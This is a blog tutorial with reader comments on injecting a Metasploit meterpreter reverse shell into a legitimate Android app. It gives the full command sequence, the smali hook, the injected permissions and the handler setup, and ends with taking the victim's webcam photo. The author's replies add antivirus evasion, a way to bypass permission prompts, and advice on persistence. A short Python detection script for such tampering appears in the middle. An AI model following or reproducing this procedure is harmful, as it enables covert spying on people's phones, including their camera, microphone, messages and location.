Inject a meterpreter payload. This video shows how to manually inject a meterpreter payload into an Android application. With this method, once you get the victim to install the infected application, you can gain control over the device, including camera, microphone, location, etc. Note that, for the victim to install the infected application, the device has to be configured to allow installations from unknown sources, which is a bad security practice for mobile devices.
Manually injecting a meterpreter payload:
1) Generate msfvenom Android payload.
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.6 LPORT=4444 R > payload.apk
2) Decode payload with apktool.
apktool d payload.apk
3) Decode target app with apktool.
apktool d com.securitygrind.application.apk
4) Inject payload code into decoded target app.
mkdir com.securitygrind.application/smali/com/metasploit/
mkdir com.securitygrind.application/smali/com/metasploit/stage
cp payload/smali/com/metasploit/stage/* com.securitygrind.application/smali/com/metasploit/stage/
5) Add meterpreter hook.
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
6) Inject permissions in AndroidManifest.xml
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.CALL_PHONE"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.WRITE_CONTACTS"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="android.permission.CAMERA"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.SET_WALLPAPER"/>
<uses-permission android:name="android.permission.READ_CALL_LOG"/>
<uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
<uses-feature android:name="android.hardware.camera"/>
<uses-feature android:name="android.hardware.camera.autofocus"/>
<uses-feature android:name="android.hardware.microphone"/>
7) Re-build target app with apktool.
apktool b com.securitygrind.application
8) Sign the target app apk with jarsigner.
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore /securitygrind/key/mykeystore.ks com.securitygrind.application/dist/com.securitygrind.application.apk mykeystore
9) zipalign the target app apk.
zipalign -v 4 com.securitygrind.application/dist/com.securitygrind.application.apk com.securitygrind.application/dist/securitygrind.apk
10) Install the target app.
You need to first enable installation from Unknown Sources: Settings -> Security -> Unknown Sources (turn on)
11) Start the msfconsole reverse handler.
echo "use exploit/multi/handler" > meterpreter.rc
echo "set PAYLOAD android/meterpreter/reverse_tcp" >> meterpreter.rc
echo "set LHOST 192.168.0.6" >> meterpreter.rc
echo "set LPORT 4444" >> meterpreter.rc
echo "exploit -j -z" >> meterpreter.rc
msfconsole -r meterpreter.rc
12) Run the target app.
Run the app on the device.
Check the msfconsole for reverse handler session.
13) Interact with the session.
sessions -i 1
webcam_snap
14) ENJOY!
Conclusion
This post shows how manually injecting a meterpreter payload into an Android application works. So, unless you know what you are doing, allowing installations from unknown sources represents a high risk for the mobile user, since applications that may seem harmless at first sight could contain malware that puts the user's information and privacy at risk.
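As an added triage check (not code from the original post), the script below inspects an apktool-decoded directory for the traces this walkthrough leaves behind: the sensitive permissions from step 6, a targetSdkVersion lowered below 23 alongside them (the uses-sdk workaround discussed in the comments), the com/metasploit/stage smali path from step 4 and the Payload;->start hook from step 5. The sample app it builds is constructed here; its directory layout and names are assumptions.

```python
import os
import re
import tempfile
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
# Smali hook from step 5 of the post; finding it in an app is a strong indicator.
STAGE_HOOK = re.compile(r"Lcom/metasploit/stage/Payload;->start\(")
# Subset of the permissions injected in step 6 that expose sensors and private data.
SENSITIVE = {"android.permission.CAMERA", "android.permission.RECORD_AUDIO",
             "android.permission.READ_SMS", "android.permission.SEND_SMS",
             "android.permission.READ_CONTACTS", "android.permission.READ_CALL_LOG",
             "android.permission.ACCESS_FINE_LOCATION"}

def triage_decoded_apk(root):
    """Return a list of findings for an 'apktool d' output directory."""
    findings = []
    manifest = ET.parse(os.path.join(root, "AndroidManifest.xml")).getroot()
    perms = {p.get(ANDROID_NS + "name") for p in manifest.iter("uses-permission")}
    hits = sorted(perms & SENSITIVE)
    if hits:
        findings.append("sensitive permissions: " + ", ".join(hits))
    sdk = manifest.find("uses-sdk")
    if sdk is not None:
        target = int(sdk.get(ANDROID_NS + "targetSdkVersion", "0"))
        # Apps targeting API 23+ must request these permissions at runtime; a lower
        # target combined with sensitive permissions matches the uses-sdk trick.
        if target < 23 and hits:
            findings.append(f"targetSdkVersion {target} with sensitive permissions")
    if os.path.isdir(os.path.join(root, "smali", "com", "metasploit", "stage")):
        findings.append("smali/com/metasploit/stage directory present")
    for dirpath, _, files in os.walk(os.path.join(root, "smali")):
        for name in sorted(files):
            if name.endswith(".smali"):
                with open(os.path.join(dirpath, name), encoding="utf-8") as fh:
                    if STAGE_HOOK.search(fh.read()):
                        findings.append(f"Payload;->start hook in {name}")
    return findings

def build_sample(root):
    """Write a constructed decoded app that mirrors the post's modifications."""
    os.makedirs(os.path.join(root, "smali", "com", "metasploit", "stage"))
    os.makedirs(os.path.join(root, "smali", "com", "example"))
    manifest = ('<manifest xmlns:android="http://schemas.android.com/apk/res/android">'
                '<uses-sdk android:minSdkVersion="22" android:targetSdkVersion="22"/>'
                '<uses-permission android:name="android.permission.INTERNET"/>'
                '<uses-permission android:name="android.permission.CAMERA"/>'
                '<uses-permission android:name="android.permission.READ_SMS"/></manifest>')
    with open(os.path.join(root, "AndroidManifest.xml"), "w", encoding="utf-8") as fh:
        fh.write(manifest)
    hooked = os.path.join(root, "smali", "com", "example", "MainActivity.smali")
    with open(hooked, "w", encoding="utf-8") as fh:
        fh.write(".method protected onCreate(Landroid/os/Bundle;)V\n    invoke-static {p0}, "
                 "Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V\n.end method\n")

def run_sample():
    """Build the constructed sample in a temp dir and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        return triage_decoded_apk(tmp)
```

Point triage_decoded_apk at any apktool output directory; the four findings from run_sample are what a tampered build of this post's kind produces.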
Hello, after the bundle, the payload does not get permission. Opening the camera will crash.
Hi,
Try this: set the <uses-sdk> tag as shown below when tampering the application:
<uses-sdk android:minSdkVersion="22" android:targetSdkVersion="22" />
More details in a comment below, started by Rehman and followed up by Mubarak.
Regards,
Cristian
Hello, the program installed correctly. AVG antivirus detected it, and I can't access the meterpreter session. It can't open!
Hi,
To avoid detection you may want to use an obfuscated or even encrypted payload; this can be accomplished by using a tool like Veil-Evasion or Venom, similar to this: https://gbhackers.com/bypass-antivirus-using-payload/
Thanks,
Cristian
Hi, how can I reconnect the sessions after killing the sessions, and after the target phone shuts down? Please.
Hi,
Well, you could create and execute a small script that uses the am (activity manager) to constantly start the main activity in the app, which will spawn new meterpreter sessions. However, that will stop working after a shutdown/restart. To really persist control over the device, you would first be required to gain root access, so that you can write a similar script into system/etc/init.d and register the script to start at boot time.
Thanks,
Cristian
Can this method bypass AV and Google Play protection?
Not really; meterpreter payloads are very common, and any decent AV should be able to detect them.
Hello, in pass 8, where can I find my key? I'm trying to sign Spotify. Thanks.
Hello Alex,
Since we are tampering with the application, you will need to use your own key for signing the resulting application. If you don't have a key, then you can create one using keytool, with a command similar to this:
keytool -genkey -v -keystore key.keystore -alias alias -keyalg RSA -keysize 2048 -validity 10000
Regards,
Cristian
I am getting an error after installing the apk bound with the payload on my Android device.
Error:
java.lang.NoClassDefFoundError: Failed resolution of: Lcom/metasploit/stage/e; at com.metasploit.stage.Payload.startInPath(Unknown Source:13) at com.metasploit.stage.Payload.start(Unknown Source:10)…at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:873)Caused by: java.lang.ClassNotFoundException: Didn’t find class “com.metasploit.stage.e” on path: DexPathList[[zip file “/system/framework/org.apache.http.legacy.boot.jar”,… at dalvik.system.BaseDexClassLoader.findClass(BaseDexClassLoader.java:134) at java.lang.ClassLoader.loadClass(ClassLoader.java:379) at java.lang.ClassLoader.loadClass(ClassLoader.java:312) … 18 more
Hello,
Well, it looks like something went wrong in step 4 while injecting the payload code into the decoded target application. The error points at a class that hasn't been defined, so either the stage code was not included/injected or there was a problem while re-building the app with apktool. I recommend revisiting those steps!
Regards,
Cristian
Hi, when I try to start the app on my phone it's just up for 1 second and then crashes with the error "Not Responding".
Hello,
Please check the logs with logcat for a more specific error message; the "Not Responding" message is not specific enough to troubleshoot.
Regards,
Cristian
Problem occurred in rebuilding the app:
I: Smaling smali_classes2 folder into classes2.dex…
[Fatal Error] :23:35: Open quote is expected for attribute “android:name” associated with an element type “uses-permission”.
I: Building resources…W: /home/suriyaprakash/Downloads/gallery/AndroidManifest.xml:23: error: Error parsing XML: not well-formed (invalid token)
…res, -M, /home/suriyaprakash/Downloads/gallery/AndroidManifest.xml]
Please help.
Hi Surya,
It looks like there is an error in your AndroidManifest.xml file, near the section where you are setting the permissions (uses-permission). Please double check that this section is well formed (there seems to be a missing double quote somewhere). Also, if you copied the uses-permission entries from this post and pasted them into your AndroidManifest.xml, then check that the pasted text is well formatted (under the XML format standard).
Regards,
Cristian
Sir, I bound the payload successfully using msfvenom and then I installed the injected apk on my mobile, but the permissions are not auto-allowed.
If they are allowed manually then all things work.
Please give any solution.
Hi Rehman,
I'm not sure I follow, but I'll try to respond. In short, yes, the victim user needs to approve the permissions during installation of the application; this is just how the system works. Now, the delivery method of this attack relies more on the fact that some users just don't pay attention to what they are accepting while installing an application. To the keen user, having an application ask for too many or unnecessary permissions should be a red flag.
Regards,
Cristian
@Cristian R.
What he is exactly asking is:
If you install just the payload without embedding it into any apk, then all the permissions which were specified in the AndroidManifest are enabled by default.
But if you embed the payload (as shown in this article) then by default all the permissions are disabled, and you have to write runtime permission code to ask the user in the main activity of the app again.
Is there any workaround for this?
Hello Mubarak,
I see, thanks for clarifying, that's a good question! I think that depends on the API level you are targeting; runtime permissions are required when targeting API 24 and above.
One approach would be to use only the permissions that are strictly required for an attack and add code for requesting runtime permissions for only those (not the entire list we used in the above post).
Now, I was also experimenting with this and might have found a workaround (but it is kind of ugly): when tampering with the application, also set the SDK version within the AndroidManifest.xml as follows:
<uses-sdk android:minSdkVersion="23" android:targetSdkVersion="23" />
This will make the application target an API level below API 23 (since we are already tampering with the application permissions, why not add our own tag as well?).
This is what I did for an application targeting API level 23 or above:
1. Tampered the application and included the required Android permissions.
2. Re-built the application.
3. After installing and running the application I get the meterpreter session.
4. Tried to take a photo (webcam_snap).
5. Got an "Operation failed" error message.
6. Checking logcat, this is due to a Permission Denial: can't use camera (since no runtime permissions were asked for).
Now, I do the following for the same application:
1. Tamper the application, include the required Android permissions AND the <uses-sdk> tag as described above.
2. Re-built the application.
3. After installing and running the application I get the meterpreter session.
4. Try to take photo (webcam_snap).
5. Got frame (success).
Regards,
Cristian
How do I auto-allow all the permissions of the payload?
Hari,
Try this: set the <uses-sdk> tag as shown below when tampering the application’s AndroidManifest.xml:
<uses-sdk android:minSdkVersion="23" android:targetSdkVersion="23" />
More details in the comment started by Rehman and followed up by Mubarak right before your comment.
Regards,
Cristian
Hi, after installing the payload on the victim's phone, the meterpreter session gets timed out, like: Meterpreter session 2 closed. Reason: Died. Is there any permanent solution for this? As far as I have seen, only if you turn the autostart option on in the Android device does the session stay alive. If not, the session dies after some 5 or 6 minutes.
Hi,
I'm not sure about this one; I've seen similar problems that are related either to AV, the network or even to using an old version of Metasploit. I'd suggest taking a look at the Metasploit logs and seeing if there is something useful in there (Metasploit Logs).
Regards,
Cristian
Hi,
Can you please tell me how to reduce the permissions?
As you know, there are a large number of permissions.
I personally don't need all the permissions, and it also makes the victim suspicious of my BACKDOOR. Every time I try to modify the payload, I lose the session or an error occurs during installation.
Also, I am not trying to inject the application with a backdoor. Otherwise, I would have solved the permissions issue from :~$ leafpad appfile/AndroidManifest.xml
I am working on a simple payload and all I want is to reduce the permissions.
HOPE YOU CAN HELP ME
Hello,
I'm not aware of any way to specify which permissions you want to add when creating the Android backdoor using msfvenom.
Instead, you could generate the usual apk backdoor, reverse that with apktool (using the d flag, similar to what’s done in the above article), edit the AndroidManifest.xml file to leave only the permissions you need and then rebuild the backdoor with apktool too (by using the b flag, similar to above).
Regards,
Cristian
Hello, I tried the fix provided for the permissions issue but it doesn't seem to work, as I don't seem to have the " " tag; here is what I have instead. And yes, I already changed the value to 23, and still the embedded app states that it does not require any special permissions at install time.
Hi,
It looks like your comment got mangled a little bit; I don't think all the details got through. In any case, with the uses-sdk tag, the idea is that permissions are sort of "auto-allowed" when the application is installing. This is because later SDK versions will also require the application to request permissions at runtime (not only at installation time), which makes the approval of permissions a little more complicated from the attacker's point of view.
Regards,
Cristian
Hi Sir,
Greetings!
I could install the payload but the app is not opening on the target machine. I have tried after disabling the antivirus programs. Please help!
Thank you in advance!
Hello,
Could be many things. Have you tried reviewing the logs with logcat to see if you can find a clue? You can also try generating and installing a pure msfvenom apk payload and check if that works.
Regards,
Cristian
Hello !
When I run the webcam_snap command in meterpreter, it shows an error like this:
meterpreter > webcam_snap
[*] Starting…
[*] 127.0.0.1 – Meterpreter session 2 closed. Reason: Died
And then the app closes automatically.
Please help me to resolve this!
Thank You !
Hello Shehan,
Difficult to say with only that information. I suggest reviewing the logs with logcat to see what you can find; you can also try generating and installing a pure msfvenom apk payload and check if that works.
Regards,
Cristian
I tried and tried but no luck.
Has anyone tried with Spotify (modded version)?
Hello,
Are you getting any errors at any of the steps? It’s hard to say without more details.
Regards,
Cristian
On step 3, apktool does not decode properly: when I try to open the AndroidManifest.xml I hit an error about the file format and decoding…
Exactly what is the error you are seeing? Please share more details.
Regards,
Cristian
When I am trying to build the apk with apktool I get this error, please help me:
root@hp-HP-431-Notebook-PC:/home/hp/Desktop# apktool b bajaj
I: Using Apktool 2.4.0-dirty
I: Checking whether sources has changed…
I: Smaling smali folder into classes.dex…
Exception in thread “main” org.jf.util.ExceptionWithContext: Exception occurred while writing code_item for method Landroidx/collection/LongSparseArray;->clone()Landroidx/collection/LongSparseArray;
at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:917)
at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:341)
at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:297)
at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:61)
at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:36)
at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:419)
at brut.androlib.Androlib.buildSources(Androlib.java:350)
at brut.androlib.Androlib.build(Androlib.java:302)
at brut.androlib.Androlib.build(Androlib.java:269)
at brut.apktool.Main.cmdBuild(Main.java:247)
at brut.apktool.Main.main(Main.java:79)
Caused by: org.jf.util.ExceptionWithContext: Error while writing instruction at code offset 0x12
at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1190)
at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:913)
… 10 more
Caused by: org.jf.util.ExceptionWithContext: Unsigned short value out of range: 65541
at org.jf.dexlib2.writer.DexDataWriter.writeUshort(DexDataWriter.java:116)
at org.jf.dexlib2.writer.InstructionWriter.write(InstructionWriter.java:356)
at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1150)
… 11 more
Hi Mohit,
I'm not familiar with this error; I'd suggest you use the latest version of apktool and give it a try to see how it goes.
Regards,
Cristian
This is because of the encoder. I faced the same problem, but when I removed the encoder the problem was solved.
And yeah, I have a problem with injecting the hook: where do I do this? I have no idea.
Hi, can someone access Android root if the phone is not rooted?
And what if the victim installs the application but does not give it any permissions at all? In that case, will someone be able to access SMS, contacts and other info on the target's phone?
Hey Abrar,
If the phone is not rooted, then getting access to root is what you do via the process of rooting, so the answer is yes!
Also, for the second question, a few comments above someone already asked something similar I believe; there is a workaround, which is to set the SDK version when tampering with the application. In the AndroidManifest.xml use something like the following:
<uses-sdk android:minSdkVersion="23" android:targetSdkVersion="23" />
This will make the application target API level 23 (since we are already tampering with the application permissions, why not add our own target tag as well?). This works because on API 23 the security enhancements around permissions (like requiring the user to manually approve them) are not present.
Regards,
Cristian
In my app, LoginActivity.smali does not exist. What do I do now?
Hello, thank you so much.
Can you tell me why YouTube is removing my videos about hacking,
while a lot of guys upload the same content about hacking and YouTube does not remove them?
Hi Ahmed,
I read somewhere that YouTube was tightening up their policies around hacking material, but I'm not sure exactly what the reasoning behind what to remove or not remove is.
Regards,
Cristian
The problem is there are two AndroidManifest.xml files. One is in the root of the decompiled app and the other is in the original folder. Which should I edit? And the one in the original folder is not readable; it's like it's encrypted.
Hello there, I am facing a problem: when the app is run by the user I am getting a session, but when the user closes the app the session keeps dying. Yeah, I executed the shell script but it is not working on Android versions 8, 9, 10, 11, 12; the persistence is not working.
Hi sir,
I make the payload with msfvenom and also inject the payload with this command:
msfvenom -x ex.apk -p android/meterpreter/reverse_tcp lhost= lport= -o ex.apk
All things done 100%,
but when I install the apk on the target machine, it shows errors:
app is not responding,
app is closed,
some apps show a black screen,
this is an older version, app may not work properly,
and sometimes they even show the error "this app is compromised".
Sir, please tell me the solution.
Waiting,
thanks
I am not able to run apktool d com.securitygrind.application.apk.
The error occurs: Input file (com.securitygrind.application.apk) was not found or was not readable.
Bro, how to solve the problem of "meterpreter session closed, reason: died"? Please tell me how to solve this as soon as possible.
Enter Passphrase for keystore:
What do I need to enter in this field?